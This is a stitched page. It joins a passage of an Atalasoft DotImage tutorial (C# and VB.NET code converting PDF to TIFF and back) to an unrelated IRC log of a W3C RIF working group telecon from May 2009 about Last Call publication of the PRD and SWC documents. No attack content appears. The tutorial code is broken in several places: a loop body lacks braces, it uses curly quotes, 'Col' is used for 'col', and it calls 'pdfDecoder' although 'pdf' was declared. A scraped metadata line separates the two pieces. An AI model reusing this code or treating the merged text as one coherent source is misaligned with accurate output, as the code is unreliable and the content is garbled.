Using fs As New FileStream("pathToSaveTo", FileMode.OpenOrCreate) Using fsis As New FileSystemImageSource("PathToSourceTiff", True) enc.Save(fs, fsis, Nothing) End UsingEnd Using
The other two approaches are still possible, but strongly discouraged in favor of using our ImageSource as outlined above. The reference here is kept for archival purposes.
The first is to have all of the images (pages of the TIFF file) loaded into memory at once, and pass them all to the TiffEncoder to save the file. As you can tell, this is not very memory efficient for large documents. The second way to save a TIFF file is to append the pages, one by one to an existing TIFF file. This way, we only need to keep a single image in memory at any given time.
As with all mutlipage formats, DotImage lets us read a single page from a file. So we can load each page from the PDF file as needed. As you can see from the following example, the first way is much easier to implement, but the second way will conserve a lot of memory.
// First way
enc.Save(outStream,myImageCollection,null);
// Second way
TiffEncoder noAppend = new TiffEncoder(TiffCompression.Default, true);
PdfDecoder pdf = new PdfDecoder();
for(int i=0; i< numPages; i++)
AtalaImage img = pdfDecoder.Read(inStream, i, null);
noAppend.Save(outStream, img, null);
img.Dispose(); outStream.Seek(0, SeekOrigin.Begin);
' First way
Private enc As TiffEncoder = New TiffEncoder()
enc.Save(outStream,myImageCollection,Nothing)
' Second way
Dim noAppend As TiffEncoder = New TiffEncoder(TiffCompression.Default, True)
Dim pdf As PdfDecoder = New PdfDecoder()
Dim i As Integer=0
Do While i< numPages
Dim img As AtalaImage = pdfDecoder.Read(inStream,i,Nothing)
noAppend.Save(outStream, img, Nothing)
img.Dispose() outStream.Seek(0, SeekOrigin.Begin)
i += 1
Loop
That’s it! We have just converted a PDF file to a TIFF file. Now to save the TIFF as PDF. The PdfEncoder in DotImage does not allow us to save a single page to an existing PDF file, so we must have all the images ready when we save the file. But the good part is that these images don’t necessarily need to be held in memory. The PdfEncoder has the standard overload to save an AtalaImage or ImageCollection, but it also introduces a new class called PdfImageCollection, which is made up of PdfImage’s. This class gives us the flexibility to point to a file instead of an image in memory. To do this, simply create a PdfImageCollection that contains a PdfImage that points to the TIFF file that we want to convert.
PdfImageCollection col = new PdfImageCollection();
Col.Add(new PdfImage(“TheDoc.tif”, -1, PdfCompressionType.Auto));
PdfEncoder enc = new PdfEncoder();
enc.Save(outStream,col,null);
Private col As PdfImageCollection = New PdfImageCollection()
Col.Add(New PdfImage(“TheDoc.tif”, -1, PdfCompressionType.Auto))
Dim enc As PdfEncoder = New PdfEncoder()
enc.Save(outStream,col,Nothing)
Giving -1 as the frame index will force the entire TIFF image to be loaded. Converting to PDF isn’t really any harder than converting the other way, it just requires a little more knowledge of the PDF namespace. Using these techniques, the ability to convert from TIFF to PDF, and vice versa, can be easily integrated into any document imaging application using DotImage.
Namespaces used in these examples:
Atalasoft.Imaging
Atalasoft.Imaging.Codec
Atalasoft.Imaging.Codec.Pdf
PDF to TIFF sample app | http://www.atalasoft.com/KB/Article.aspx?id=10125&cNode=6U4E4R | CC-MAIN-2018-39 | refinedweb | 848 | 57.98 |
Well which compiler / IDE are you using?
Well which compiler / IDE are you using?
1, indentation really helps to see what's going on.
#include <stdio.h>
#include <stdlib.h>
int main()
{
int Option, ResCount, Resistors, ResValue, ResTotal;
ResCount = 0;
Yeah, 500 lines of poorly formatted code containing goto's is not a good start.
You have a lot of printf's in there, perhaps you could post those as well.
Bear in mind that either we can't run...
You need to return the new length of the array, after you've removed the duplicates.
> Enter the number of digits : 4
Presumably, you used scanf with %d to read this.
> Enter the number in binaries : 1001
What did you use to read this?
One you have a sequence of 0 and 1, then...
> Always a good idea to give a hand to the compiler,
Or a bad idea.
If you write overly micro-managed "efficient" code, you typically subvert the ability of the optimiser to see through your...
> direction += rotation;
> double ax = acceleration * cos(direction);
> double ay = acceleration * sin(direction);
The first question to ask would be what units your angles are measured...
> for example L = [3, 2, 7, 5, 8]
> if I wanna find successor for 3 it has to be bigger than 3 but smaller than other numbers which is 5.
The question is only meaningful if the list is sorted.
...
> sum_age = sum + list[i].age;
Where is this declared in your code?
At best, it's some messy global variable.
At worst, it's undeclared and your code doesn't even compile.
void...
> int sum_age;
What is the initial value of sum_age?
> sum_age = sum + list[i].age;
What is sum here?
Where did you declare it?
> if(list[i].gender == male)
Use strcmp() to compare strings.
#define FALSE 0u
#define TRUE (~FALSE)
TRUE becomes all bits set in whatever width of data type you end up assigning it to.
Regarding delete
void Delete(personaData list[50], int x)
{
int pnum;
printf("Enter a personal number:");
scanf("%d", pnum);
char emptyStr[20] = {"\0"};
int...
A for loop with a[i] = -a[i]; perhaps?
> printf("%d\n", &length); // prints 6422272
Because you don't use & when printing a value.
> for(i = 0; i <= length; i++)
Arrays run from 0 to length-1
So we usually say
for(i = 0; i <...
Which compiler / IDE are you using?
If you're compiling from the command line, all you need is
g++ main.cpp operator.cpp
So, do you have any code to start with?
Just dumping your assignment on us with zero effort isn't good.
> On the Y axis the temperature should appear and on the X axis the 100 steps.
So you should only be outputting pairs of numbers to begin with.
Using strtok is messy, because you also need to...
> There is no operator present.
But in the context of an expression requiring a boolean expression,
while(numbers[ball])
is the same as
while(numbers[ball] != 0)
Since you then go onto do...
Do you have some context for the question?
> What can be the usage of this?
Typedef'ing a function pointer is very common.
Primarily because they're quite complicated to get right, and they...
cdecl: C gibberish <-> English
It's a function pointer.
Moved to right forum.
Copy and paste your code between
A fuzzy picture of barely legible text just doesn't cut it.
Since you mentioned visual studio, I'll assume your OS is windows.
If you're writing a GUI program, start here
Keyboard Input (Get Started with Win32 and C++) - Win32 apps | Microsoft Docs
Using...
OK, so what vague ideas do you have, so we can help you make them less vague. | https://cboard.cprogramming.com/search.php?s=4d2c1bf22234007d62830f1c5a1b1237&searchid=6400330 | CC-MAIN-2021-10 | refinedweb | 622 | 76.72 |
Reading files from the operating system can be done with T-SQL as I showed in the tip Using OPENROWSET to read large files into SQL Server. What if you want to write to an operating system file? For example, writing to a text file. There's no T-SQL that supports writing to a file.
Solution
The solution is to create a stored procedure that is implemented in the SQLCLR, which allows writing code in .Net languages and running them within SQL Server. Stored procedures can be written in C#, VB.Net or C++ and the compiler produces an assembly, which is the code compiled into .Net Intermediate Language (IL). The assembly is then loaded into SQL Server and a stored procedure is defined to call one of the static methods in the assembly. When the stored procedure is invoked by a T-SQL EXECUTE statement the .Net assembly is loaded, Just-in-Time (JIT) compiled into machine code and the machine code is loaded into SQL Server's memory. SQLCLR code is similar to extended stored procedures and it is intended to replace extended stored procedures when that feature is phased out of SQL Server in a future release.
The easiest way to create SQLCLR objects is to use the Database project template in Visual Studio 2005 Professional Edition or Team Edition. Visual Studio 2008 with Service Pack 1 also supports database projects for SQL Server 2008. Before I walk through that process you're going to need a database. The example files use a connection to the database ns_lib, which you can create with this T-SQL:
Once you have a database, you'll need to pick a programming language. This tip is written in C# but you can also use VB.Net or C++. Then in Visual Studio use the File/New/Project menu command and specify the project name and folder. Here I've named the project ns_txt:
If you have existing database connections defined in Visual Studio, the "Add Database Reference" dialog box will open and you'll be given the chance to pick one of the Available References as depicted here:
You can pick a database reference or press the "Add New Reference..." button. If you don't have existing connections Visual Studio goes right to the "New Database Reference" screen and allows you to create a connection to the database where you want the SQLCLR assembly to be loaded. The following picture shows adding a connection to the ns_lib database on the local machine's default instance:
Once a connection is selected Visual Studio will ask to enable debugging with this dialog box:
The facility to debug the CLR code while it's being called from within SQL Server is a fantastic aid to productivity. However, debugging stops all managed threads, which is the SQLCLR code, from running while debugging. Therefore, I only debug CLR code running on my local development machine. Never debug SQLCLR code on a production server. You can learn more about debugging in this tip Debugging SQL Server CLR functions, triggers and stored procedures. Pick Yes to enable debugging, or No if you don't want it.
Visual Studio creates the project files and you can start work. The next step is to add the stored procedure to the project. Do this by selecting the ns_txt project in the Solution Explorer window and using the menu command Project/Add Stored Procedure. The Add New Item dialog box pops up and you can name the file for your stored procedure code: Here's the dialog with the name that I've chosen, ns_txt_file_write.
Visual Studio creates the file with a partial class named StoredProcedures. You can change that name, if you like. It also creates a "public static void" method for your procedure with the name you gave it and no parameters. Above the procedure declaration is the line "[Microsoft.SqlServer.Server.SqlProcedure]". This line is an attribute that tells Visual Studio how to deploy the procedure into SQL Server.
Now that the project and code file are created, it's time to write the code that implements the stored procedure. ns_txt_file_write has two parameters, file_name and file_contents. Both are strings declared with the SqlString type. The Microsoft.Data.SqlTypes namespace, which is referenced in the third using statement, provides types that allow SQL Server to convey the data precisely and include properties such as IsNull, to communicate that a value is null as well as conversion functions. While it's possible to use CLR types, such as string, for the parameters, I prefer to stick to the SqlTypes to avoid conversion overhead. However, the SqlTypes don't match up with that the CLR expects for strings or integers so in the C# it's necessary to refer to the Value property of the parameter in order to use the variable.
Here's the function all done:
That's it? All this activity for just one line? It's kind of disappointing but it illustrates the power of the SQLCLR. The CLR has the built-in method AppendAllText that takes care of the job and all that ns_txt_file_write has to do is expose it to SQL Server.
There's one more step required before testing the procedure. Because ns_txt_file_write reaches outside of SQL Server into the file system, the permission level given to this code must be raised. By default the permission level of Visual Studio Database projects is Safe, which doesn't allow access outside of SQL Server. The permission level External lets the code access the file system and other external resources, such as Active Directory or web services. There is a third permission level, Unsafe, which allows the use of unmanaged code and calls to Windows API functions. While it's called Unsafe, it's no worse then the permissions given to external stored procedures.
The permission level is set on the Database tab of the projects properties. The following screen shot shows the Permission Level highlighted in red:
Now that everything is ready the project can be compiled and loaded into SQL Server using the menu command Build/Deploy Solution.... That almost works. Instead of deploying to SQL Server I got this message:
CREATE ASSEMBLY for assembly 'ns_txt' failed because assembly 'ns_txt'. If you have restored or attached this database, make sure the database owner is mapped to the correct login on this server. If not, use sp_changedbowner to fix the problem.
As the message explains, SQLCLR code with the EXTERNAL_ACCESS permission set must either be signed or the database must be given the TRUSTWORTHY attribute. Code signing is a subject for another tip so here let's use the easier alternative of making the database TRUSTWORTHY with this ALTER DATABASE statement:
Another problem that you may run into is database ownership. As the message indicates the owner of the database must have EXTERNAL ACCESS ASSEMBLY permission for assemblies that require external access to work. I prefer to have databases owned by sa so if your database isn't, it can be changed with this exec statement:
My next try with the menu command Build/Deploy Solution was successful. Behind the scenes Visual Studio is telling SQL Server to create an assembly from the compiled code and to create the stored procedures with these SQL Statements:
Using a Visual Studio Database project makes creating SQLCLR procedures easy but you could use a text editor to create the cs file and handle the compiling, assembly loading, and stored procedure creation yourself. To read more about how to do that see the tip CLR function to delete older backup and log files in SQL Server, which shows the individual steps.
Once these security issues are managed and the deployment is successful, it's time to test out the stored procedure. From an SSMS query window it is now possible to execute the procedure. You may have to modify the @file_name parameter of the following query to point to a directory that exists on your server. Once it's set go ahead and execute it:
There are additional details, such as error handling, that can be handled more robustly but this simple example illustrates how to create a stored procedure that takes advantage of the power of the CLR from within SQL Server. The procedure is also limited to working with @file_contents of only 4000 characters because of the data type given to the stored procedure by Visual Studio.
The SQLCLR was introduced in SQL Server 2005 and has been enhanced for SQL Server 2008. In earlier versions similar functionality can be achieved by writing extended stored procedures or in SQL Server 2000 using the sp_OA_* extended stored procedures to invoke COM objects running outside of SQL Server. Those solutions are more dangerous to SQL Server and in the case of Ole Automation much slower. The SQLCLR is a significant improvement in the capability of SQL Server and it can be used to create database objects other than stored procedures such as functions, triggers, user-defined aggregates, user-defined types and triggers.
Next Steps | http://www.mssqltips.com/sqlservertip/1662/writing-to-an-operating-system-file-using-the-sql-server-sqlclr/ | CC-MAIN-2015-14 | refinedweb | 1,516 | 59.84 |
IRC log of rif on 2009-05-26
Timestamps are in UTC.
14:47:38 [RRSAgent]
RRSAgent has joined #rif
14:47:38 [RRSAgent]
logging to
14:47:44 [ChrisW]
zakim, this will be rif
14:47:44 [Zakim]
ok, ChrisW; I see SW_RIF()11:00AM scheduled to start in 13 minutes
14:47:47 [ChrisW]
zakim, clear agenda
14:47:47 [Zakim]
agenda cleared
14:47:56 [ChrisW]
Chair: Chris Welty
14:48:01 [ChrisW]
rrsagent, make minutes
14:48:01 [RRSAgent]
I have made the request to generate
ChrisW
14:48:18 [ChrisW]
Meeting: RIF Telecon 26-May-2009
14:48:32 [ChrisW]
Agenda:
14:49:05 [ChrisW]
ChrisW has changed the topic to: RIF Last Call Day II Telecon, Agenda
14:49:34 [ChrisW]
Regrets: PaulVincent
14:49:57 [ChrisW]
rrsagent, make logs public
14:50:50 [ChrisW]
agenda+ Admin
14:50:59 [ChrisW]
agenda+ Liason
14:51:10 [ChrisW]
agenda+ Action Review
14:51:17 [MoZ]
s/Liason/Liaison/
14:51:28 [ChrisW]
agenda+ PRD
14:51:32 [ChrisW]
agenda+ SWC
14:51:35 [ChrisW]
agenda+ FLD
14:51:44 [ChrisW]
agenda+ XML Schema task force
14:51:52 [ChrisW]
agenda+ WG Future and schedule
14:51:58 [ChrisW]
agenda+ rdf:text
14:52:01 [ChrisW]
agenda+ AOB
14:52:09 [ChrisW]
zakim, take up next item
14:52:09 [Zakim]
agendum 1. "Admin" taken up [from ChrisW]
14:58:54 [Zakim]
SW_RIF()11:00AM has now started
14:58:58 [Zakim]
+Sandro
14:59:18 [mdean]
mdean has joined #rif
14:59:37 [AdrianP]
AdrianP has joined #rif
14:59:38 [josb]
josb has joined #rif
14:59:48 [csma]
csma has joined #rif
15:00:27 [Zakim]
+Mike_Dean
15:00:52 [Zakim]
+Hassan_Ait-Kaci
15:01:34 [StellaMitchell]
StellaMitchell has joined #rif
15:01:45 [Zakim]
+[IBM]
15:01:54 [ChrisW]
Scribe: Mike Dean
15:02:00 [ChrisW]
scribenick: mdean
15:02:09 [ChrisW]
zakim, ibm is temporarily me
15:02:09 [Zakim]
+ChrisW; got it
15:02:22 [Zakim]
+??P15
15:02:23 [Zakim]
+Stella_Mitchell
15:02:25 [ChrisW]
zakim, Mike_Dean is mdean
15:02:25 [Zakim]
+mdean; got it
15:02:31 [hak]
hak has joined #rif
15:02:48 [ChrisW]
zakim, ??P15 is cke
15:02:48 [Zakim]
+cke; got it
15:02:48 [Harold]
Harold has joined #rif
15:02:53 [ChrisW]
zakim, who is on the phone?
15:02:53 [Zakim]
On the phone I see Sandro, mdean, Hassan_Ait-Kaci, ChrisW, cke, Stella_Mitchell
15:03:19 [cke]
cke has joined #RIF
15:03:32 [ChrisW]
zakim, Hassan_Ait-Kaci is hak
15:03:32 [Zakim]
+hak; got it
15:03:43 [ChrisW]
zakim, mute hak
15:03:43 [Zakim]
hak should now be muted
15:04:29 [Zakim]
+[NRCC]
15:04:43 [DaveReynolds]
DaveReynolds has joined #rif
15:04:47 [Harold]
zakim, [NRCC] is me
15:04:49 [Zakim]
+Harold; got it
15:05:02 [Zakim]
+??P42
15:05:19 [Zakim]
+[IPcaller]
15:05:26 [Zakim]
+??P44
15:05:29 [AdrianP]
Zakim, [IPcaller] is me
15:05:29 [Zakim]
+AdrianP; got it
15:06:02 [ChrisW]
zakim, who is on the phone?
15:06:02 [Zakim]
On the phone I see Sandro, mdean, hak (muted), ChrisW, cke, Stella_Mitchell, Harold, DaveReynolds, AdrianP, josb
15:06:27 [cke]
Christian is in IRC, but not on the phone
15:06:31 [DaveReynolds]
Apologies but I need to leave the call early (by about 40 min)
15:06:46 [ChrisW]
15:06:52 [ChrisW]
PROPOSED: accept last weeks minutes
15:07:12 [ChrisW]
RESOLVED: accept last weeks minutes
15:07:15 [mdean]
ChrisW: contain 3 last call resolutions
15:07:22 [Gary_Hallmark]
Gary_Hallmark has joined #rif
15:07:23 [ChrisW]
zakim, next item
15:07:23 [Zakim]
agendum 2. "Liason" taken up [from ChrisW]
15:07:27 [mdean]
ChrisW: no agenda amendments
15:08:05 [Zakim]
+Gary
15:08:08 [mdean]
Sandro: SPARQL working group response and discussion about rdf:text
15:08:23 [mdean]
... need about 3 words change - mention SPARQL explicitly - all editorial
15:08:24 [Zakim]
+csma
15:08:33 [mdean]
... lots of people misunderstood spec
15:08:36 [csma]
zakim, csma is me
15:08:36 [Zakim]
+csma; got it
15:08:38 [mdean]
... close to consensus
15:09:11 [mdean]
... Axel proposed change from rdf:text to rdf:plainLiteral
15:09:21 [csma]
zakim, mute me
15:09:21 [Zakim]
csma.a should now be muted
15:09:27 [josb]
I would be fine with the name change
15:09:31 [mdean]
... don't expect any (other) substantiive changes
15:09:51 [mdean]
ChrisW: shouldn't require another last call by itself
15:10:26 [mdean]
Sandro: OWL 2 close to CR - one more document and internal approval - should be CR in a couple weeks
15:10:35 [ChrisW]
zakim, next item
15:10:35 [Zakim]
agendum 3. "Action Review" taken up [from ChrisW]
15:10:53 [MichaelKifer]
MichaelKifer has joined #rif
15:11:26 [ChrisW]
close action-822
15:11:27 [trackbot]
ACTION-822 Change subscript "l" in 6.1 to something else (not so confused with "1") and have Jos proof-read the change. closed
15:11:41 [Zakim]
+MichaelKifer
15:11:55 [csma]
zakim, who is on the phone?
15:11:55 [Zakim]
On the phone I see Sandro, mdean, hak (muted), ChrisW, cke, Stella_Mitchell, Harold, DaveReynolds, AdrianP, josb, Gary, csma.a (muted), MichaelKifer
15:11:57 [mdean]
close action-821
15:11:57 [trackbot]
ACTION-821 Review pending DTB actions (815-820) closed
15:12:46 [csma]
782 and 784 are continued
15:12:56 [StellaMitchell]
zakim, Stella_Mitchell is really me
15:12:56 [Zakim]
+StellaMitchell; got it
15:13:23 [mdean]
780 and 777 are continued
15:13:28 [csma]
zakim, unmute me
15:13:28 [Zakim]
csma.a should no longer be muted
15:13:34 [Zakim]
-MichaelKifer
15:14:04 [mdean]
csma: hope for PRD last call today
15:14:38 [mdean]
ChrisW: Axel hasn't yet reviewed appendix
15:14:48 [mdean]
772 and 770 are continued
15:15:42 [mdean]
close action-770
15:15:42 [trackbot]
ACTION-770 Review Core closed
15:17:07 [mdean]
765 is continued
15:17:10 [StellaMitchell]
708 continued (in progress)
15:17:20 [hak]
continued until further notice ... (will get really serious on it when all the RIF XML vocabularies are stable - last call)
15:17:42 [mdean]
ChrisW: concludes open actions
15:18:00 [AxelPolleres]
AxelPolleres has joined #rif
15:18:12 [mdean]
... pending review: test cases, DTB treatment of casting
15:18:15 [csma]
zakim, mute me
15:18:15 [Zakim]
csma.a should now be muted
15:18:31 [mdean]
close action-740
15:18:31 [trackbot]
ACTION-740 Accomodate casting functions in a well defined manner closed
15:19:00 [Harold]
zakim, who is on the phone?
15:19:00 [Zakim]
On the phone I see Sandro, mdean, hak (muted), ChrisW, cke, StellaMitchell, Harold, DaveReynolds, AdrianP, josb, Gary, csma.a (muted)
15:19:01 [mdean]
close action-815
15:19:01 [trackbot]
ACTION-815 Mark rdf:text at risk in DTB closed
15:19:14 [Harold]
zakim, who is on the phone?
15:19:14 [Zakim]
On the phone I see Sandro, mdean, hak (muted), ChrisW, cke, StellaMitchell, Harold, DaveReynolds, AdrianP, josb, Gary, csma.a (muted)
15:19:38 [mdean]
close action-816
15:19:38 [trackbot]
ACTION-816 Rename "primitive" datatypes to datatypes closed
15:19:42 [mdean]
close action-815
15:19:42 [trackbot]
ACTION-815 Mark rdf:text at risk in DTB closed
15:19:47 [mdean]
close action-818
15:19:47 [trackbot]
ACTION-818 Make base directive iris absolute closed
15:19:55 [ChrisW]
zakim, next item
15:19:55 [Zakim]
agendum 4. "PRD" taken up [from ChrisW]
15:20:04 [mdean]
ChrisW: concludes action review
15:20:17 [csma]
zakim, unmute me
15:20:17 [Zakim]
csma.a should no longer be muted
15:20:42 [Zakim]
+AxelPolleres
15:20:48 [mdean]
... reviewers for PRD: Harold and Shanghai (sp)
15:21:12 [cke]
s/Shanghai/Changhai
15:21:15 [sandro]
sandro has joined #rif
15:21:35 [mdean]
csma: English proofreading
15:22:23 [mdean]
csma: Adrian addressed model theoretic concerns
15:22:27 [sandro]
Harold, do you know how to do wiki diffs? They are pretty readable these days...
15:22:29 [sandro]
(usually)
15:22:48 [mdean]
... moved semantics of conditions to appendix
15:24:11 [mdean]
... target audience more familiar with pattern-matching semantics
15:24:49 [Zakim]
+MichaelKifer
15:25:21 [mdean]
Harold: (forward) references to appendix are OK
15:25:34 [cke]
Christian, your change addresses my main concern. The others are more minor
15:26:20 [Harold]
PRD Editors, the Abstract is still a bit short.
15:26:25 [mdean]
Gary: would like pattern-matching and model theory to be equivalent, but requires talking about safety
15:26:55 [Harold]
s/safety/safeness/
15:27:21 [mdean]
csma: only reference to safety in conformance and definition in core, which may be obscure to non-logician
15:27:54 [mdean]
s/safety/safeness
15:28:21 [mdean]
csma: perhaps remove pattern matching from title of section
15:28:51 [mdean]
Gary: don't require constraint solving
15:29:34 [mdean]
csma: current definitions are equivalent
15:29:55 [mdean]
... this is an editorial change
15:30:01 [mdean]
Gary: wasn't obvious from my reading
15:30:19 [mdean]
csma: pattern matching title is misleading
15:31:00 [mdean]
csma: operational definition of safeness - working on it for a while
15:31:13 [mdean]
... hesitant to make Last Call dependent on such an editorial change
15:32:21 [sandro]
csma: This is just an editorial change; it does not affect conformance. we're clear that constraint satisfaction is not needed in consumers.
15:32:48 [Zakim]
+LeoraMorgenstern
15:33:32 [cke]
Does PRD inherit the safeness from Core??
15:33:33 [sandro]
csma: This will make understanding PRD easier for users, but does not change definition. We should work on this later, after Last Call.
15:33:56 [sandro]
chris: the change is: the move discussion of safeness to be earlier in document?
15:34:15 [sandro]
csma: Not exactly: to add an operational definition of safeness. Maybe move it -- I don't know.
15:34:43 [AdrianP]
we should try to build the PRD safety defintion upon the Core safety definition
15:35:10 [sandro]
chris: everyone agree that an operational definition of safeness is not required for last call?
15:35:19 [sandro]
harold: agreed
15:35:26 [josb]
agreed
15:35:40 [cke]
There is so far no mention of safeness in PRD.
15:35:59 [sandro]
mdean, don't let me as stop you from scribing -- I just want additional clarity on bits which I think are crucial to minute.
15:36:39 [csma]
Changhai: there is, in the conformance section.
15:38:39 [ChrisW]
zakim, who is talking?
15:38:48 [Gary]
2 issues: 1. is the model theory and pattern matching really the same? or does pattern matching imply safeness? 2. assuming equivalent, we should make it more obvious that safeness is required and can be used to simplify implementation
15:38:50 [Zakim]
ChrisW, listening for 10 seconds I heard sound from the following: csma.a (92%)
15:38:58 [ChrisW]
zakim, who is talking?
15:39:10 [Zakim]
ChrisW, listening for 10 seconds I heard sound from the following: csma.a (75%)
15:40:23 [csma]
actions: check that the two spec of the semantics of the condition are equivalent
15:41:55 [ChrisW]
action: chris to review PRD operational and model=theoretic conditions are =
15:41:55 [trackbot]
Created ACTION-824 - Review PRD operational and model=theoretic conditions are = [on Christopher Welty - due 2009-06-02].
15:41:57 [csma]
... clarify that safeness is required to guarantee that constraint solving is not required for RIF-PRD
15:43:34 [ChrisW]
action: csma to clarify in PRD that safeness is required to guarantee that constraint solving is not needed
15:43:34 [trackbot]
Created ACTION-825 - Clarify in PRD that safeness is required to guarantee that constraint solving is not needed [on Christian de Sainte Marie - due 2009-06-02].
15:43:40 [mdean]
csma: should satisfy Gary's comment
15:43:49 [csma]
... add, if possible, an operational definition of safety
15:44:10 [ChrisW]
action: csma add, if possible, an operational definition of safety
15:44:10 [trackbot]
Created ACTION-826 - Add, if possible, an operational definition of safety [on Christian de Sainte Marie - due 2009-06-02].
15:44:21 [mdean]
csma: definition would probably go in appendix
15:44:58 [mdean]
ChrisW: Last Call dependent on completion of actions 824 and 825
15:45:22 [mdean]
csma: also need to remove appendix 13 - currently incomplete
15:45:23 [ChrisW]
action: csma to fix or remove appendix 13
15:45:23 [trackbot]
Created ACTION-827 - Fix or remove appendix 13 [on Christian de Sainte Marie - due 2009-06-02].
15:45:48 [ChrisW]
action: gary review csma changes to PRD
15:45:48 [trackbot]
Created ACTION-828 - Review csma changes to PRD [on Gary Hallmark - due 2009-06-02].
15:46:27 [mdean]
csma: Last Call dependent on completion of 824, 825, 827, 828
15:47:23 [ChrisW]
PROPOSED: Publish PRD as Last Call, contingent on completion of actions 824, 825, 827, and 828
15:47:34 [Harold]
+1
15:47:36 [AdrianP]
+1
15:47:37 [cke]
+1
15:47:39 [StellaMitchell]
+1
15:47:40 [Gary]
+1
15:47:40 [mdean]
+1
15:47:41 [DaveReynolds]
+1
15:47:45 [hak]
+1
15:47:47 [ChrisW]
Axel: +1 (on phone)
15:47:51 [apollere2]
apollere2 has joined #rif
15:47:53 [MichaelKifer]
+1
15:47:54 [josb]
0 [since I could not review it]
15:47:56 [ChrisW]
+1
15:48:09 [sandro]
+1
15:48:13 [apollere2]
+1
15:48:14 [ChrisW]
zakim, who is on the phone?
15:48:14 [Zakim]
On the phone I see Sandro, mdean, hak (muted), ChrisW, cke, StellaMitchell, Harold, DaveReynolds, AdrianP, josb, Gary, csma.a, AxelPolleres, MichaelKifer, LeoraMorgenstern
15:49:07 [ChrisW]
Leora: +1 (on phone)
15:49:18 [ChrisW]
RESOLVED: Publish PRD as Last Call, contingent on completion of actions 824, 825, 827, and 828
15:49:24 [ChrisW]
zakim, next item
15:49:24 [Zakim]
agendum 5. "SWC" taken up [from ChrisW]
15:49:36 [csma]
zakim, mute me
15:49:36 [Zakim]
csma.a should now be muted
15:49:46 [mdean]
ChrisW: 2 reviews, from Axel and Gary
15:50:44 [mdean]
ChrisW: PRD checklist includes - check syntactic list ... from core
15:50:44 [ChrisW]
ack csma.a
15:50:47 [csma]
zakim, unmute me
15:50:47 [Zakim]
csma.a was not muted, csma
15:51:07 [mdean]
s/.../restriction/
15:51:45 [mdean]
Adrian: done for presentation syntax and XML
15:51:57 [mdean]
ChrisW: back to SWC
15:52:14 [mdean]
Axel: import for OWL, but OWL doesn't have import for RIF (e.g. DL Safe RIF Rules)
15:52:28 [mdean]
... a couple editorial items
15:53:01 [mdean]
... XML Schema namespace prefix terminology
15:53:18 [mdean]
ChrisW: not fixed?
15:53:27 [mdean]
Axel: no email from Jos
15:53:38 [mdean]
Jos: not yet incorporated
15:54:17 [mdean]
ChrisW: make concrete list and action, so vote can be contingent
15:54:18 [csma]
zakim, mute me
15:54:18 [Zakim]
csma.a should now be muted
15:55:34 [mdean]
Axel: multi-structures look different from BLD
15:56:04 ).
15:57:20 [Zakim]
-DaveReynolds
15:59:02 [mdean]
ChrisW: changed a couple months ago
15:59:38 [mdean]
MichaelKifer: lack of uniformity entailing formulas that are not documents
16:00:19 [mdean]
... can now adorn any structure with any formula
16:00:45 [mdean]
s/can now/could/
16:00:56 [mdean]
... now more restrictive
16:01:17 [mdean]
... role of each item in semantic structure is now clear
16:01:28 [csma]
(Re lists in PRD: I just checked, and the abstract syntax includes the restriction)
16:01:52 [mdean]
... also allows more uniformity in FLD
16:02:51 [mdean]
ChrisW: SWC still has old multi-structure definition
16:03:12 [mdean]
MichaelKifer: ... not needed there, kind of artificial
16:04:12 [mdean]
Axel: recursive imports needs to be clarified
16:05:04 [mdean]
Jos: addressed in section 5.2
16:05:25 [mdean]
s/addressed/recursive imports addressed/
16:06:08 [mdean]
ChrisW: imports closure
16:06:53 [ChrisW]
action: josb to update SWC to new BLD definition of multi-structures
16:06:53 [trackbot]
Created ACTION-829 - Update SWC to new BLD definition of multi-structures [on Jos de Bruijn - due 2009-06-02].
16:10:01 [ChrisW]
action: to review jos' edits to SWC
16:10:01 [trackbot]
Sorry, couldn't find user - to
16:10:06 [ChrisW]
action: axel to review jos' edits to SWC
16:10:07 [trackbot]
Created ACTION-830 - Review jos' edits to SWC [on Axel Polleres - due 2009-06-02].
16:10:32 [mdean]
Gary: all known issues have been taken care of
16:11:45 [mdean]
Jos: suggest publishing SWC without proofs
16:12:57 [mdean]
Sandro: haven't asked for publication date yet - probably June 2 or 4, but could probably push off to June 9
16:13:31 [mdean]
ChrisW: proofs are non-normative
16:14:04 [mdean]
Jos: might require small changes
16:14:06 [sandro]
bug-fixed after Last Call are okay.
16:15:17 [mdean]
Sandro: worth waiting for proofs?
16:15:55 [mdean]
... but extra week would also help for rdf:text
16:16:32 [mdean]
Chris: get well soon
16:16:48 [ChrisW]
action: josb to finish the SWC proofs or remove them
16:16:48 [trackbot]
Created ACTION-831 - Finish the SWC proofs or remove them [on Jos de Bruijn - due 2009-06-02].
16:16:49 [mdean]
s/Chris/ChrisW/
16:17:20 [ChrisW]
PROPOSED: publish SWC as Last Call, pending completion of actions 829, 831, and 830
16:17:37 [AdrianP]
+1
16:17:39 [ChrisW]
+1
16:17:41 [josb]
+1
16:17:42 [Harold]
+1
16:17:43 [cke]
+1
16:17:43 [sandro]
+1
16:17:43 [StellaMitchell]
+1
16:17:43 [hak]
+1
16:17:44 [Gary]
+1
16:17:44 [MichaelKifer]
+1
16:17:45 [mdean]
+1
16:17:47 [apollere2]
+1
16:17:50 [ChrisW]
Leora: +1 (on phone)
16:18:06 [ChrisW]
RESOLVED: publish SWC as Last Call, pending completion of actions 829, 831, and 830
16:18:17 [ChrisW]
zakim, next item
16:18:17 [Zakim]
agendum 7. "XML Schema task force" taken up [from ChrisW]
16:18:30 [ChrisW]
zakim, list agenda
16:18:30 [Zakim]
I see 4 items remaining on the agenda:
16:18:32 [Zakim]
7. XML Schema task force [from ChrisW]
16:18:33 [Zakim]
8. WG Future and schedule [from ChrisW]
16:18:34 [Zakim]
9. rdf:text [from ChrisW]
16:18:34 [Zakim]
10. AOB [from ChrisW]
16:18:40 [ChrisW]
zakim, take up item 6
16:18:40 [Zakim]
agendum 6. "FLD" taken up [from ChrisW]
16:19:04 [mdean]
ChrisW: reviewed by Stella and Chris
16:19:17 [mdean]
StellaMitchell: all comments have been addressed
16:20:23 [ChrisW]
"All logic RIF dialects are required to be derived from RIF-FLD by specialization, as explained..."
16:20:43 [ChrisW]
"MUST"
16:22:07 [csma]
+1 that non-conformance is not weel defined, if it is a MUST
16:22:09 [ChrisW]
"All RIF dialects SHOULD be derived from RIF-FLD by specialization, as explained..."
16:22:19 [mdean]
s/weel/well/
16:23:14 [csma]
q+
16:23:34 [mdean]
ChrisW: SHOULD implies that you should say why if you can't do something
16:24:09 [Harold]
End of first paragraph: "Therefore, any logic dialect being developed to become a standard should either be a specialization of FLD or justify its extensions to (or, deviations from) FLD"
16:25:35 [csma]
q?
16:25:39 [Harold]
